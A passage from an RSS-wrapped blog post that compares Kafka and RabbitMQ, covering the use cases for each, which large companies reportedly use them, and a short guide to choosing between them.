&lt;li&gt;Kafka is also perfect for fraud detection, user-behavior analytics, and predictive maintenance, since all three require real-time streaming analytics and need to process and store large volumes of data.
&lt;/li&gt;
&lt;li&gt;Kafka can be used to build event-driven architectures, where events trigger actions in other systems or applications. This makes it a good fit for use cases such as microservices, IoT, and data pipelines.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Here are some of the best use cases for RabbitMQ:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;As explained earlier, RabbitMQ is a great choice for use cases that don’t require real-time processing. Asynchronous task queues—such as workflow automation, background job processing, and message-based task distribution—all fall into this category.
&lt;/li&gt;
&lt;li&gt;RabbitMQ is optimized for reliable, asynchronous message delivery, making it a good fit for message-driven architectures where applications exchange messages with each other.&lt;/li&gt;
&lt;li&gt;RabbitMQ can be used to build distributed systems, where different components communicate with each other through message passing. This makes it a good fit for use cases such as chat applications, multiplayer games, and peer-to-peer networks.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The “big dogs”: who’s using what and why?
&lt;/h2&gt;

&lt;p&gt;Some of the world’s largest enterprises are using Kafka for their event-driven, streaming, and messaging applications. The platform’s scalability, reliability, and real-time processing capabilities are critical to these organizations’ success.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here’s who’s using Kafka and for what:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; The company (which, by the way, originally created Kafka) uses Kafka extensively for data processing. This behemoth employs its platform to collect, process, and analyze real-time data from various sources across LinkedIn's infrastructure. One great example is its newsfeed, where millions of people post to the feed (the append-only log in action) and other people can read those posts either in real time or later, at their leisure. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Netflix:&lt;/strong&gt; Kafka underpins Netflix’s real-time streaming platform, which handles millions of events per second. The platform enables Netflix to process and analyze all this data in real time, providing insights into user behavior and enabling personalized recommendations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Uber:&lt;/strong&gt; Among other real-time data-processing applications, Uber uses Kafka to feed its Apache Flink-based stream processing. It enables the rideshare and delivery company to handle high volumes of real-time transactions. It also gives Uber insights into user behavior, traffic patterns, and pricing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Airbnb:&lt;/strong&gt; Like Uber, Airbnb has its own stream-processing framework—StreamAlert. Kafka provides Airbnb with the real-time analytics it needs to understand its user behavior and provide personalized recommendations, among other things.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Goldman Sachs:&lt;/strong&gt; Kafka enables Goldman Sachs to process and analyze real-time market data. Its high-volume trading platform requires the scale that Kafka can provide to help its users make informed trading decisions.
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Many large companies leverage RabbitMQ’s strengths for real-time communication, IoT platforms, microservices architecture, and mission-critical systems—in some cases, in addition to Kafka. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here’s who’s using RabbitMQ and for what:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Airbnb:&lt;/strong&gt; Although it uses Kafka for StreamAlert, Airbnb uses RabbitMQ to power its messaging platform, which enables communication between hosts. It relies on RabbitMQ’s reliable message delivery and scalability, both of which are critical for the high volume of messages exchanged on Airbnb’s platform.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Uber:&lt;/strong&gt; Like Airbnb, Uber uses RabbitMQ, in addition to Kafka, to handle the real-time messaging exchanged between drivers and riders/customers. It also uses RabbitMQ for internal communication between different components of its systems.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Siemens:&lt;/strong&gt; Siemens uses RabbitMQ for MindSphere, a proprietary IoT platform for industrial applications. Mindsphere uses large volumes of messages from sensors and devices, which the company needs to process and analyze in real time.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NASA&lt;/strong&gt;: NASA’s telemetry system collects data from spacecraft and ground stations. RabbitMQ provides the reliable, efficient message delivery these mission-critical applications demand.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SoundCloud:&lt;/strong&gt; RabbitMQ enables SoundCloud’s platform to scale its microservices architecture to handle high volumes of requests. The platform relies on RabbitMQ for reliable message delivery and for communication between different components of the system.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  It’s a multi-platform world
&lt;/h2&gt;

&lt;p&gt;In sum, there are definite differences between Kafka and RabbitMQ that make them useful for specific applications. And as you can see, they’re not mutually exclusive, either. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What should you choose?&lt;/strong&gt; &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Do you have a need for a messaging system that involves one message per person, like Starbucks? You should choose RabbitMQ.&lt;/li&gt;
&lt;li&gt;Do you stream large volumes of data, where the data is the same but there are multiple receivers, like the Netflix example? Kafka is your best option. &lt;/li&gt;
&lt;li&gt;Do you need to persist your data? Go Kafka. &lt;/li&gt;
&lt;li&gt;Do you have peer-to-peer networks? RabbitMQ’s for you. &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Does your company use Kafka, RabbitMQ, or both? Let me know how and why in the comments. And don't forget to &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA"&gt;connect with Outshift on Slack&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>kafka</category>
      <category>rabbitmq</category>
      <category>streaming</category>
    </item>
  </channel>
</rss>
